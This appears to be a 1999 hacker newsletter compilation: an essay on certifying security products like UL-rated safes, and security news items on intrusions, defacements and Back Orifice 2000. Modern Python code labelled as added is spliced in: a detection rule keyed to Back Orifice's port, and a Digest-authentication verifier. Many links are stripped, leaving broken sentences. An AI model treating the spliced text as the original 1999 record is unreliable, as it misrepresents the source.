Similar to early electrical inventions, today's computer security products may introduce more harm than good when implemented by end users. While some of these products do what they claim, most do not. The lack of standards and meaningful certification has allowed the sale of products that are either intentionally or unintentionally snake-oil. While many of the products may solve old problems and inadvertently introduce worse ones, some just do not perform as advertised at all. For instance, some products have been marketed as utilizing the latest and greatest encryption mechanisms when in fact, the version they are selling does not utilize any encryption at all.

Just as in the late 1800's, the consumers have little understanding of the inventions they are purchasing. They are presented with claims by the product's marketers and have no way of proving those claims to be true or false. Just as it was back then, this has not stopped the large-scale application of these inventions, regardless of public safety.

In the late 1900's, nobody has stepped up to the plate to expand the UL's role into computer security products or to take that role as their own. To some extent, groups like Nomad Mobile Research Center and L0pht Heavy Industries have acted as modern day Merrills, publishing non-biased findings to this effect.

This is not to say that certification of computer security products has not been attempted in the past. ICSA, for instance, operates a certification program for products. CISSP and other organizations also offer certification of information security professionals. These organizations, however, have failed drastically at providing what the UL has provided on a more general 'technology' level. These failures could be examined in detail but such an exercise is outside the scope of this article.

The bottom line for ICSA is that it does not have the rigorous standards that the UL has and its credibility has suffered as a result. ICSA fails to see the certification process as ongoing or cyclical, allowing for products to inherit their 'certification'. As a result, it is believed by some that there is a problem in that there is a lack of non-biased inspection of software and that money buys more certifications than good product design and implementation.

CISSP certifies individuals in the computer security industry. While sorting out those who are fluent in the industry jargon and concept, the work of CISSP's still lacks accountability in that their certification is tied to a test rather than what the UL refers to as a 'field counter-check'. Like most computer certifications however, this is simply a test of test-taking skills rather than a test of experience and understanding.

Cyber-UL

Product certification needs to be performed on every version of a product. Small changes that could ripple through traditional technologies causing safety problems are at least tenfold when applied to computer software.

Many similarities may be drawn between the certification of computer security products and the listing of alarm systems and components that UL performs today. UL has a stringent set of tests which are performed on physical security systems which seek UL listing. For instance, safes and vaults have a number of different labels which indicate their adherence to different standards. UL utilizes 'young hotshot' safe-crackers wishing to make a name for themselves to do the actual testing. This way, specialists are motivated (by not only fame but by financial compensation as well) to validate the claims that the vendors' marketing people want to make. The entire safe and vault business operates around these ratings to communicate to the customer what it is that the product was designed to do. Based on value and risk, a customer may choose to spend more or less on higher or lower rated labels.

The two major factors which influence the level of rating are time and tools. The 'hotshot' safe-crackers are given samples of the product and guidelines for their attempts to defeat its security. For instance, a TL-30 rating means that the cracker is limited to tools not including torches or explosives and is given 30 minutes of actual working time to defeat the security. If X6 is appended to the rating, the rating applies to not only the door, but the container (the rest of the safe). This aligns the vendor's claims to the actual performance of the product. Also, if a new version of the safe comes out, it does not inherit the old version's listing; it must be re-listed. This addresses a big problem that was sure to arise with safe vendors and has definitely arisen in the computer security arena.

Customers, due to human nature, want products to be certified as 'secure'. Just as customers like to hear promises of security, vendors love to make them. In 1913, UL tested the first 'security devices'. With this expansion into security devices, they recognized the need to replace the word 'Approved' with the words 'Inspected' or 'Listed'. Due to what UL has established with security devices, customers are not lulled into a false sense of security and vendors do not make outrageous claims. Customers are presented with 'product x is rated at rating y' rather than 'its ICSA certified'. Vendors claim to be resistant to certain toolsets for certain amounts of time. This is not what the computer security field looks like today, but is where it needs to go.

The manufacturer and consumer must realize that testing 'security' is not the same as testing 'functionality' and because of that, claims need to be adjusted to fit reality. If a door-knob opens a door, the door works. If a safe-lock opens when you dial the combination, it does not mean the safe works. You can, however, perform tests on the safe to assure that it operates as advertised within certain heat and force constraints.

While listing individual devices as meeting UL standards is useful to a security professional or consumer, it is only a small part of the picture. Installation and configuration of components is critical to the actual effectiveness of the security solution. For this reason, installation of alarm systems is another area of influence for the UL. This may seem like a daunting task since the number of implementations is exponential to the number of products. UL has, with only about 4,000 employees, listed more than 12,500 products in over 40 countries and developed over 600 standards for product safety. The tack taken to assure the correct installation of alarm systems has been to list alarm installation companies. Systems installed by UL listed companies may qualify for a UL issued certificate.
The certificate registers the customer's alarm system becomes an eligible candidate for 'field counter-checks' (spot-audits) which are performed to assure that listed installers are not cutting corners. If a system which has received a certificate fails the field counter-check, the installer could potentially loose their UL listing. The UL has maintained a quality program by scaling the number of field counter-checks as needed. Problems with the model While the UL model for security devices seems to address many of the same issues that surround Cyberspace, there are a number of problems with deploying the model for computer security devices as it stands. The first problem is that if a security system is defeated in the physical world, it is typically very obvious to those who come into work on Monday and see that the money is gone and the safe is in pieces. Detection of a cyber intrusion is typically NOT very obvious to those who come into work on Monday. Because of this fact, safe-crackers have very limited time to crack a vault. Hackers on the other hand, have unlimited time to crack a system. Once they get in, safe crackers typically REMOVE items which then become 'missing'. Hackers typically COPY items unless their motives are political rather than financial, leaving the originals and the system intact. For cyber intrusions to become less surreptitious, intrusion detection needs to mature and become more widely deployed if 'time' is to be a meaningful factor in the process. The commercial model is based around the storage of valuables, particularly jewelry and cash. In addition to the (American) UL standards (TL-15, TL-30, TRTL-30, TRTL-15/6, TRTL-30/6, TXTL-60), there is a German standard (A,B,C1,C2,D 10, D20, E 10) and a Scandinavian standard (60-80, 80-100, 100-120, 120-140, 140-160, 160-180, 180-200, 200-240, 240-280, 280-320, 320-360). All three are based on time and tools. 
Time and tools is an excellent set of criteria for rating computer security components in areas such as encryption. In America, the various insurance agencies determine what rating is required for them to insure a given amount to be stored in the safe or vault. In Europe, the Dutch Safe Rating Committee publishes a similar standard assigning a range of financial value to each rating in each of the three systems. This does not, however, address liability for storage of information such as credit ratings, social security numbers, bank balances, web surfing preferences, political affiliations, which is subject not only to theft but to alteration or even just surreptitious access. When storing sensitive information, a more appropriate place to look for examples is to the government. Classified information presents many of the same requirements for storage that sensitive information on the public or even commercial interests. To meet the U.S. Government's needs in this area, General Services Administration (GSA) has published standards (classes 1-8, black, red, green and blue labels) which rate storage containers for everything from weapons to information processing systems to filing cabinets. They additionally publish information on storage of confidential, secret, and top-secret materials in GSA Approved (or Non-GSA Approved) containers. This information includes additional requirements for alarm systems, restricted building access, guard check points, etc... Specifics on GSA classes and labels are seemingly difficult to come by. Based on the information I have found in the document library of however, much of what has been worked out by the GSA could potentially serve as a foundation for developing similar standards for the storage of information on the public. The U.S. Department of Commerce has commissioned the National Institute of Standards and Technology (NIST) to maintain FIPS PUB 140-1, Security Requirements For Cryptographic Modules. 
The document sets forth a standard for specification of cryptographic-based security systems protecting unclassified information. It provides for product ratings from 1 to 4 with 1 being lame and 4 being k-rad. This range is designed to cover a wide range of data sensitivity, from 'low value administrative data' to 'million dollar funds transfers' to 'life protecting data'. The standard is typically utilized for devices which protect tokens or encrypt data such as crypto boxes. While this system may or may not be successful in real life, it certainly deserves closer examination in that it represents what may be the closest thing that the U.S. Government has to UL for computer security products. Under the FIPS 140-1 Testing and Validation model, vendors select an accredited FIPS 140-1 testing lab, submit their 'module' for testing and pay the testing fee. The lab then tests the product for conformance to FIPS 140-1 and passes a report on the 'module' to NIST/CSE for validation. Throughout this process, the lab may submit questions for guidance and clarification to NIST/CSE. If the report is favorable, a validation certificate is issued by NIST/CSE for the 'module'. The certificate is presented to the vendor through the lab and the 'module' is added to the published list of Validated FIPS 140-1 Modules. The problem may stem from the difference between UL's roots and those of ICSA and CISSP. It certainly manifested itself in the fact that the UL is the only one providing non-biased product inspections as well as accountability for the quality of the installations out there in the field. Requirements for the use of 'listed' intrusion detection systems, encryption mechanisms, and companies could on its own make an impact if that listing actually meant something. The use of strict procedures and specific levels of physical security could be required as in the GSA model and this too could help the private sector. This has not been the tact taken to date, however. 
The second problem is that manufacturers of physical security devices are pressured by customers to have a UL listing. This is because customers are pressured by insurance underwriters to use products that meet UL specifications. In Cyberspace, businesses currently feel that the embarrassment and loss of public trust are more costly than the actual damage caused by hackers. Citibank has become the most well-known example of what happens when computer intrusions are made public knowledge. By taking commendable actions and not covering up the intrusion, Citibank is now known as the bank that got hacked instead of the bank that handled the situation appropriately. Since silence seems to be the best policy, cyber merchants choose to 'eat' their losses rather than risk the negative publicity. Until these losses become intolerable and insurance is necessary, there may be no motivation to drive the certification, approval or listing of products by UL or any similar organization.

It took UL about 30 years from being subsidized by the insurance agencies to being self-supporting off fees paid by manufacturers for testing. Merrill was the first full-time employee as a result of this change. Insurance underwriters and Consumer Product Safety Commission were instrumental in gaining public acceptance of UL work. It was the public's safety that was of concern and liability drove companies to insure. Insurance underwriters found they were then saddled with the problem and addressed it effectively with the UL. Perhaps at some point the collection and storage of information on the public will carry some sort of liability with it.

A Call for Action

Without a call for action, I would simply be a whiner. At this point, you the reader can assist with very little effort. Whether you are a vendor, insurance company, end user, or hacker, let me know your thoughts on the state of the industry, the state of the UL and/or this article's conclusions.
As a hacker, is the relationship between the hot-shot safe crackers and the UL an attractive one you would be interested in? Is the UL listing process for installations sufficient? Will it encounter problems unforeseen by this article?

As an insurer, am I missing part of the picture; are companies actually insuring their computer systems and data to mitigate loss or liability?

As a manufacturer do you foresee problems with the UL model being imposed on computer security products?

As an end user do you feel that computer security is important? Do you feel that the current system actually is sufficient? Have you been wanting something better or do you feel that you are being slighted by my insinuation that you do not fully understand the products you purchase?

Any and all feedback on this article would be appreciated no matter where it comes from (although manufacturer comments will be taken with a grain of salt). Forward those comments to If there is enough feedback, I may write a follow up article on this topic. I am considering going into detail on each rating system UL, German, Scandinavian, GSA and FIPS 140-1, highlighting overlaps with the computer security discipline.

Thanks to the UL for providing documentation on the history of the UL and directing me to Peter Tallman of the Melville, N.Y. office. Thanks to Peter Tallman for clarifying some of the issues surrounding the listing of safes and alarm systems and directing me to Beverly Borowski whom I hope can assist me in my future research. Also of use to date was FED-STD-809, the federal standard for neutralization and repair of GSA approved containers as well as a yearly publication by the Dutch Safe Rating Committee called 'Recommendations for Insuring Money in Safes and Strongrooms'. GSA's web site ( provides a searchable index of federal standards including FED-STD-809. The Dutch Safe Rating Committee is at Stichting Kwaliteitsbeoordeling Brandkasten (SKB), P.O. Box 85764, 2508 CL The Hague, The Netherlands - Tel. 070-3912008. Additional thanks to the researchers at the L0pht for their assistance, particularly to Brian Oblivion for providing extensive documentation on FIPS 140-1.

@HWA

20.0 BugTraq Moves To SecurityFocus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN contributed by Aleph One

BUGTRAQ, the premier security mailing list, will officially be moving from its current home at to on July 5th. Security Focus will be a major security web site featuring complete BugTraq archives, Daily News, vulnerability information and lots and lots more.

Security-Focus

InfoWorld Security Watch | Stuart McClure and Joel Scambray

Portals open on security landscape

AS SECURITY GROWS into a major concern for IT shops, a number of online security portals have sprouted up. These offer nearly everything you'll need to manage security at your site. A number of Web pages have begun in the last couple of months, but the most impressive ones are just now opening. We have frequented many in our security travels, and we think that, a site debuting the week of June 26, looks the most promising for providing comprehensive and one-stop security information.

Since we started Security Watch more than a year ago, we've seen our column's name borrowed by a number of people. Now you'll have to add, in Belgium, to that list ( According to its semi-veiled Web page, the site will debut July 5 and will offer the usual security news, products, trends, jobs, literature, and links. But, like, also promises a vulnerability database. The depth and breadth of its vulnerability archive remains to be seen, however, as we have yet to receive an offer to preview this site (surprise, surprise).

One of the earliest collections of security resources on the Internet came from The site has been available for more than a few months and offers security news, reviews, exploits, and tools.
Although its content isn't as complete or as well organized as that of some others, it offers a decent set of security resources and timely vulnerabilities that we have frequented and highly recommend checking out.

has been around for a number of months and offers a fairly good set of security content including a weekly column, security news, discussion forums, services, a research center (links and resources), and even an online store. It also offers a centralized location to search for computer security jobs at all the major career sites, including Career Builder, Career Mosaic, and Monster Board.

is a relative newcomer and at first glance looks much like a general search engine. The site offers a variety of security information and resources, and even allows you to add your URL to its site. But unlike and, SecureZone does not offer its own vulnerability database. Also, we experienced delays when using the site; be prepared for a wait. The site is run by En Garde Systems (, the product vendor that offers the nifty security software T-Sight and IP-Watcher.

The heavy hitter

Combine the Bugtraq archive (, Packet Storm's exploits and tools (, and Hacker News Network's timely news (, and you'll barely scratch the surface of the content provided on ( The new Web site should be up this week and will offer one of the best collections of security resources available on the Internet. We got a sneak peek at this site and were duly impressed.

For starters, Securityfocus.com offers one of the most up-to-date security news sections available. Also included on the site are security tools, products, books, an events calendar, and forums. But unlike many of its competitors, offers a robust -- and free -- vulnerability database. The site also lets you query for only the technology that's important to you. For example, if you're primarily a Solaris 2.51 shop running Netscape Enterprise Server, you can query only the relevant vulnerabilities.
You can personalize the entire Web site by selecting the type of news, calendar events, products, tools, and vulnerabilities you care about. will also provide a free applet for your desktop that will warn you as soon as a relevant vulnerability is released.

is the brainchild of the original Secure Networks group. The team created the Ballista security scanner product (now named CyberCop Scanner from Network Associates) and has discovered numerous product vulnerabilities on its own. Aleph One, the moderator and caretaker of the Bugtraq mailing list (one of the most widely subscribed computer lists in the world), has added his muscle to the site in offering the entire Bugtraq archive as part of the vulnerability database. Also, the entire Bugtraq mailing list will be moved to so archives can be searched.

After witnessing the birth of so many security portals on the Internet during the past year, we can't help but wonder what's next for the security community. Personally, we wouldn't mind seeing the paging service that warns administrators about new vulnerabilities the minute they become public, or maybe the downloading of daily security news to your Pilot with AvantGo ( In any case, the future is definitely bright for security professionals. Check out these portals and let us know which ones you'll be visiting at

Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's eSecurity Solutions group. They have managed information security in academic, corporate, and government environments.

@HWA

21.0 MS Gives Out Pirate Dough
~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN contributed by Code Kid

Microsoft is planning to give away up to $25 million over the next five years, or half of its proceeds from its antipiracy efforts, toward technology access and education projects around the world. MS estimates that it will receive approx. $10 million in civil and criminal antipiracy proceeds annually over the next five years.
Wired

Microsoft Shares Piracy Loot
Reuters
3:00 a.m. 29.Jun.99.PDT

Microsoft plans to give away half its proceeds from efforts to crack down on software piracy, or at least US$25 million over the next five years, a company executive said. Brad Smith, general counsel for worldwide sales and support for Microsoft, said the software company is seeing a growing stream of revenue from settlements and criminal penalties assessed against counterfeiters.

"Obviously we rely heavily on law enforcement for support," Smith said. "Given that support from the public sector, we felt it was proper to share some of these recoveries with the communities that, like the company, are suffering from piracy."

He said that Microsoft, which had $14.5 billion in revenues last year, expects at least $10 million in civil and criminal antipiracy proceeds annually over the next five years, although he said the company is spending more than that on efforts to enforce software laws. Smith said piracy is not necessarily growing, but authorities are increasing their enforcement in part because many large counterfeiting operations are connected to organized crime.

"The reason we go after it so much is because we're cutting off a major source of funding for criminal syndicates," said Marc Frank, a Westminster, California, police sergeant who heads the multi-agency Asian Organized Crime Task Force. "It's not because we're the Microsoft police," he said. "It's because we're hitting the organized criminal syndicate where it hurts them -- in the pocketbook."

The task force's efforts culminated this year with a raid on a factory in the southern California city where officers found $2.5 million in manufacturing equipment and more than $40 million worth of counterfeit Microsoft Windows, Office, and other programs. A total of 11 people have been arrested or indicted in connection with the raid, Frank said.
Microsoft's donations will go toward technology access and education projects around the world, Smith said.

Copyright 1999 Reuters Limited.

@HWA

22.0 Biometrics comes to Home Shopping
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN contributed by RickDogg

The Home Shopping Network will introduce biometric security to a large variety of consumers when it launches its voice-print technology next month. This new technology will enable HSN to automatically identify customers by their voice. This will allow repeat customers to order products faster and will allow HSN to create a very accurate customer database.

Wired

Giving Voice to Net Security
by Leander Kahney
3:00 a.m. 29.Jun.99.PDT

The Home Shopping Network next month will be able to automatically identify customers on the phone by their voices. In the first large-scale deployment of its kind, HSN's speech-print service will allow frequent shoppers to dispense with passwords and personal identification numbers, the company said.

Voice recognition is just the first step: HSN said it hopes to completely automate the ordering process by the end of the year. Based on technology from Nuance Communications, the voiceprint system will ask callers for their phone numbers. Callers will then be passed on to human order-takers to complete the purchase.

"[Voice-recognition systems] are a lot more convenient for the customer and can save the company a lot of money," said Steve Ehrlich, Nuance's vice president of marketing. Automated phone-ordering systems can cost 90 percent less than conventional, human-operated systems, according to Ehrlich, who said Charles Schwab will roll out a similar system later this year. He said the technology handles a number of languages and copes well with regional accents and things like bad phone lines and stuffy noses.
In addition to convenience, the technology will help HSN build a detailed database of its customers, said Bill Meisel, editor and publisher of the Speech Recognition Update, a monthly newsletter. Currently, a household is issued a single verification number by HSN. The voiceprint technology will allow the company to identify and collect data on individual members in a household, Meisel said. "These are the kind of subtle advantages that make fraud prevention almost a secondary consideration," he said.

However, Meisel said the voiceprint system will be more secure than using a verification number. To crack the system would require a wiretap to obtain an accurate recording of someone's voice, Meisel said. It should not be possible to simply use a tape recorder. "The process of taping a voice changes its acoustic characteristics," he said. "It wouldn't work with a tape recorder ... practically speaking, it's very difficult [to crack the system]."

Meisel said similar voice-recognition systems are in use in prisons, where calling rights are a form of prison commerce.

@HWA

23.0 Palm VII Revealed
~~~~~~~~~~~~~~~~~

June 29th
From HNN contributed by Kingpin

Too poor to buy a Palm VII? Don't want to risk your new toy? Well one brave soul has taken apart his Palm VII, taken pictures, and posted them to the web. A nice treat for you hardware guys.

The Gadgeteer

@HWA

24.0 Who Is HNN?
~~~~~~~~~~~

June 29th
From HNN contributed by Space Rogue

A lot of people have asked just who is it that runs HNN and keeps the place together. We have created a page to answer just that question. The page even has pictures and everything.

Who Is HNN?

HNN will be packing up shop and heading for Las Vegas sometime around Wednesday next week. We will do what we can to update the site remotely but the updates may be periodic at best. Besides who is going to be around to read HNN if everyone is at Defcon?
@HWA

25.0 AntiOnline on the trail of f0rpaxe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From AntiOnline

AntiOnline Tracks F0rpaxe
Tuesday, June 29, 1999 at 14:00:15
by John Vranesevich - Founder of AntiOnline

AntiOnline investigations into the recent wave of attacks being done by a group known as 'F0rpaxe' have led to the discovery of the true-life-identity of the group's leader, aka m1crochip. F0rpaxe is known to have broken into over 130 servers in the past two months, belonging to dozens of different organizations, including:

  NASA Goddard Space Flight Center
  US Navy
  US Coast Guard
  US Department of Agriculture
  US Department of the Interior
  University of Wisconsin
  Harvard University
  University of Colorado
  Georgetown University
  University of Michigan
  UC Davis

F0rpaxe officially 'Declared War' against the US government after the FBI raided several malicious hackers, including individuals known to be members of the 'gH' hacking group, which is believed to be responsible for attacks against the White House's Website. F0rpaxe released a statement earlier this month which read in part:

  We think that FBI should explain what a fuck they are doing. For the moment we wont destroy the servers we hack but if it is necessary we can burn alot of servers.

M1crochip, along with several other F0rpaxe members, have been featured in several publications, including MSNBC and Wired News. F0rpaxe's latest attack took place yesterday, against servers at UCLA. AntiOnline was able to gain the name and phone number of m1crochip, who lives in the city of Perafita, Portugal, shortly after a request for information came in.

Note: AntiOnline will not release information on this individual to the general public.

@HWA

26.0 Critical NOAA Web Site Attacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN contributed by Mortel

The Storm Prediction Center, an arm of the National Oceanic and Atmospheric Agency (NOAA) was defaced yesterday.
While the site was primarily used to distribute severe weather warnings, that information was available from other sources such as the National Weather Service. Unfortunately NOAA chose to run critical services such as email on the same machine so when they took down the server to correct the defacement their email was also off line creating severe disruptions in office work flow.

HNN Cracked Pages Archive
Fox News
MSNBC
Computer World
Andover News

Correction: 1615EST We have been informed that the email server was not on the same machine as the web server but was taken offline as a precautionary measure until the extent of the attack could be determined.

Fox;

Hackers Hit Storm Prediction Web Site
8:16 p.m. ET (017 GMT) June 29, 1999

NORMAN, Okla. Computer hackers vandalized the Web page of the top U.S. weather agency's storm prediction center Tuesday in the latest of a rash of attacks on government Internet sites, officials said. The attack blocked the Internet weather warnings of the Storm Prediction Center, an arm of the National Oceanic and Atmospheric Agency (NOAA), at a time of year when powerful thunderstorms and tornadoes can break out across the Plains states.

"If there were severe weather already happening at that time of morning, it could have been a problem for a lot of people,'' Dr Joseph Schaeffer, director of the Storm Prediction Center, told Reuters.

Hackers calling themselves the "Keebler Elves'' deleted the Storm Prediction Center homepage ( and replaced it with their own page declaring "Learn to fear the elite''. Schaeffer said the same storm forecasts were available elsewhere, including from the National Weather Service. But he said the blockage was an inconvenience to emergency management officials, who are used to quick and easy Internet access to the center's updated weather maps and other data.

The attack was discovered at 3:00 a.m. EDT (0700 GMT) by someone trying to find weather data and reported quickly, so storm center technical staffers shut down the Web page. Repairing the damage and tracing and recording the hacker's steps for potential future criminal prosecution would keep the Web site down until late Tuesday, officials said. The damage also shut down the Web page of NOAA's Severe Storm Laboratory (, which is next door to the storm prediction center in Norman, Oklahoma. The Internet pages for both centers are run from the same computer, which was invaded by the hackers.

The U.S. Army earlier Tuesday said it had launched a criminal investigation into an electronic break-in of its main Internet site, but stressed that hackers did not breach military security or operations. A hacker group also broke into four U.S. Department of Agriculture Web sites over the weekend, the USDA said. Military and other government officials have voiced major concern over repeated break-ins in the past year by electronic wizards anxious to simply show their hacking ability or to actually steal secrets. In March, a Pentagon-sponsored study ordered by Congress in 1995 concluded that military computer and communications systems were increasingly vulnerable to attack by hackers and high-tech enemies.

-=-

Computer World;

Weather Web site hit by intruders
By Kathleen Ohlson

The National Oceanic and Atmospheric Administration's (NOAA) Storm Prediction Center became the latest Web target of hackers when one or more intruders broke into the site. Both the site and e-mail for the Storm Prediction Center, based in Norman, Okla., were taken down as soon as the infiltration was detected, said Tim Tomastik, the NOAA's deputy director of public affairs in Washington.

Tomastik said the attack on the federal weather service forced its clients and customers to go to other sites for weather data. "It's weather data," he said. "There's no national security involved. I have no idea why they would go after it."
Officials are still trying to determine what, if any, damage was done to the site by the intrusion. So far, they know that some "real minor goofing with the text occurred," but nothing major, Tomastik said. Yesterday, the U.S. Army Web site was breached (see story) and the home page defaced. Tomastik said the NOAA is evaluating its system and expects federal authorities to look into what happened. The site is expected to be back up later today.

@HWA

27.0 Back Orifice 2000 is on its Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN contributed by RickDogg

Set to be released on July 10th at Defcon, Back Orifice 2000 is already making news. The new version of Back Orifice will run on NT, be much harder to detect and have a very robust plugin architecture.

Wired
Back Orifice 2000

Wired;

Coming Soon: Back Orifice 2000
by Niall McKay
3:00 a.m. 30.Jun.99.PDT

An underground computer security group is poised to release a new version of a notorious software program that could allow crackers to watch and listen in on Windows-based PC users. The Cult of the Dead Cow said it will release Back Orifice 2000 on 9 July -- at the annual Def Con convention in Las Vegas.

"This will demonstrate that Microsoft's operating systems are completely insecure and a bad choice for consumers and businesses who demand privacy," said Oxblood Ruffian, a former United Nations consultant and current Cult of the Dead Cow spokesman.

Def Con is perhaps the most unusual gathering in the computer security field. Hackers, crackers, and self-proclaimed security experts will mingle with media, security professionals, federal law enforcement officers, and "script kiddies" who deface Web pages with prefab cracking code. Security groups of all stripes use the occasion to release software and show off gadgets. But Back Orifice 2000 is perhaps the most anticipated item.
Unlike previous versions of the software, Back Orifice 2000 will run on Windows NT and feature strong encryption and a modular architecture that the group said will allow hackers and other security groups to write plug-ins. The program will be released as open source to encourage further development by the security community.

Back Orifice, released at last year's Def Con, may allow malicious users to monitor and tamper with computers without the permission or knowledge of their owners. The program is classified as a Trojan Horse because crackers need to dupe the user into installing an application on their hard disk. Despite this, Oxblood Ruffian said that the program is currently installed on up to a half-million PCs worldwide. Though that number could not be independently verified, an Australian computer security group last November said that 1,400 Australian Internet accounts have been compromised by Back Orifice.

Back Orifice 2000 also promises to be a great deal more difficult to detect than its predecessor because it enables users to configure its port setting. Previously, intrusion detection and antivirus programs could detect Back Orifice because it used a default port setting of 3113. (Er that should read 31337 -Ed)

A Microsoft Windows NT Server security manager said the company is closely monitoring Back Orifice development and is working with antivirus and intrusion detection software vendors to provide customers with utilities to combat the software. "Trojan Horses are not technological issues but a social engineering problem because they rely on the ability of the cracker to trick the user into running an application," said Scott Culp. "It's just a fact of computer science that if you run a piece of code on your machine you run the risk making your system vulnerable." The solution, according to Culp, is to ensure that users do not install any software from untrusted sources and regularly update antivirus and intrusion detection programs.
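The detection problem the article describes, as an added example that is not from the article or from any IDS vendor: a signature keyed on the original default port (31337, per the editor's correction) beside an allow-list rule that notices an internal host answering UDP on any unexpected port, run over constructed log lines in a made-up "PROTO src:sport -> dst:dport" format.

```python
# Added example: why a port signature for Back Orifice stops working once the
# port becomes configurable, and what a port-independent rule looks like.

BO_DEFAULT_PORT = 31337  # default UDP port of the original Back Orifice

# Constructed firewall log lines (not real captures). 192.0.2.0/24 stands in
# for the monitored network, 203.0.113.0/24 for the outside. The 8080 session
# is the same kind of traffic with the port changed, as BO2K allows.
SAMPLE_LOG = """\
UDP 203.0.113.5:1045 -> 192.0.2.10:31337
UDP 192.0.2.10:31337 -> 203.0.113.5:1045
UDP 203.0.113.5:1046 -> 192.0.2.11:53
UDP 192.0.2.11:53 -> 203.0.113.5:1046
UDP 203.0.113.9:1201 -> 192.0.2.12:8080
UDP 192.0.2.12:8080 -> 203.0.113.9:1201
"""


def parse_log(text):
    """Parse the constructed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        proto, src, _arrow, dst = line.split()
        sip, sport = src.rsplit(":", 1)
        dip, dport = dst.rsplit(":", 1)
        events.append({"proto": proto, "src": sip, "sport": int(sport),
                       "dst": dip, "dport": int(dport)})
    return events


def port_signature_hits(events, port=BO_DEFAULT_PORT):
    """Signature rule of the kind the article describes: UDP to or from one port.

    Only the session on the default port matches; the reconfigured one is missed.
    """
    return [e for e in events
            if e["proto"] == "UDP" and port in (e["sport"], e["dport"])]


def unexpected_udp_listeners(events, internal_prefix="192.0.2.",
                             allowed_ports=frozenset({53})):
    """Allow-list rule: internal hosts answering UDP from a port not on the list.

    Keyed on behaviour (who answers, from where) rather than on a port number,
    so it flags the 31337 session and the same session moved to 8080 alike.
    """
    answering = set()
    for e in events:
        if (e["proto"] == "UDP" and e["src"].startswith(internal_prefix)
                and e["sport"] not in allowed_ports):
            answering.add((e["src"], e["sport"]))
    return sorted(answering)


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print(len(port_signature_hits(evts)))  # 2: the 31337 session only
    print(unexpected_udp_listeners(evts))  # [('192.0.2.10', 31337), ('192.0.2.12', 8080)]
```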
Also at the show, independent security consulting firm L0pht Heavy Industries will release Anti-Sniffer, a network monitoring tool, and will announce B00te Call, a PalmPilot War Dialer. Such programs will automatically dial telephone numbers in sequence, looking for modems. Zero-Knowledge Systems is also expected to provide further details about Freedom, a network of servers promising total online anonymity.

Def Con will also feature some of its legendary sideshow attractions, such as the Spot the Fed contest. In this game, conference attendees are invited to point out suspicious attendees who may be working for federal law enforcement agencies. Winners will be awarded an "I spotted the Fed" T-shirt. Other diversions include a fancy dress ball, Hacker Jeopardy, and the Hacker Death Match, a game that enables hackers to take their flame mails out of cyberspace and into reality by dressing up in giant inflatable Sumo suits to do battle. Well-heeled attendees are invited to a US$100 outing to Cirque du Soleil.

Meanwhile, the conference will include sessions on how to detect wiretaps; the art and science of enemy profiling; hacking ethics, morality, and patriotism; cyber-forensic analysis; and a talk on the practice of hiring hackers as security consultants.

@HWA

28.0 Support for Web Security Spec Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 30th
From HNN contributed by RickDogg

Microsoft and HP have announced their support for the HTTP/1.1 Message Digest Authentication specification. This new specification published by the Internet Engineering Task Force last month proposes the use of MD5 instead of SSL for password traffic.
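The Digest scheme referred to above (RFC 2617) never sends the password itself; the client sends an MD5 "response" computed over the credentials, the request method and URI, and a server-issued nonce. The following is an added example, not code from the article or from either vendor, implementing the client-side computation and a server-side check against the list of nonces the server issued, using the public test vector from the RFC's own example (user "Mufasa", password "Circle Of Life").

```python
import hashlib
import hmac
import re

# Added example (not from the article): RFC 2617 Digest Access Authentication.
# Only the 'response' hash crosses the wire; the password stays on both ends.


def _md5hex(data: str) -> str:
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """Client side: compute the 'response' field of the Authorization header."""
    ha1 = _md5hex(f"{username}:{realm}:{password}")
    ha2 = _md5hex(f"{method}:{uri}")  # qop=auth-int would also fold in the body hash
    if qop:  # RFC 2617 form with client nonce and request counter
        return _md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return _md5hex(f"{ha1}:{nonce}:{ha2}")  # older RFC 2069 form, no qop


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')


def parse_authorization(header: str) -> dict:
    """Turn 'Digest k="v", k=v, ...' into a dict of parameters."""
    scheme, _, params = header.strip().partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest Authorization header")
    return {key: quoted or bare for key, quoted, bare in _PARAM.findall(params)}


def verify(header: str, method: str, password_lookup, issued_nonces) -> bool:
    """Server side: recompute the response and compare in constant time.

    password_lookup(username, realm) returns the stored password or None.
    issued_nonces is the set of nonces this server handed out and has not
    expired; rejecting anything else is what stops a captured header replaying.
    """
    p = parse_authorization(header)
    for required in ("username", "realm", "nonce", "uri", "response"):
        if required not in p:
            return False
    if p["nonce"] not in issued_nonces:
        return False
    password = password_lookup(p["username"], p["realm"])
    if password is None:
        return False
    expected = digest_response(p["username"], p["realm"], password, method,
                               p["uri"], p["nonce"], p.get("qop"),
                               p.get("nc"), p.get("cnonce"))
    return hmac.compare_digest(expected, p["response"])


# The worked example from RFC 2617 section 3.5 (a published test vector, not a real account).
RFC2617_EXAMPLE = (
    'Digest username="Mufasa", realm="testrealm@host.com", '
    'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="/dir/index.html", '
    'qop=auth, nc=00000001, cnonce="0a4f113b", '
    'response="6629fae49393a05397450978507c4ef1", '
    'opaque="5ccc069c403ebaf9f0171e9517f40e41"'
)


def rfc_lookup(username, realm):
    """Hypothetical credential store holding only the RFC's example account."""
    if (username, realm) == ("Mufasa", "testrealm@host.com"):
        return "Circle Of Life"
    return None


if __name__ == "__main__":
    nonces = {"dcd98b7102dd2f0e8b11d0f600bfb0c093"}
    print(verify(RFC2617_EXAMPLE, "GET", rfc_lookup, nonces))   # True
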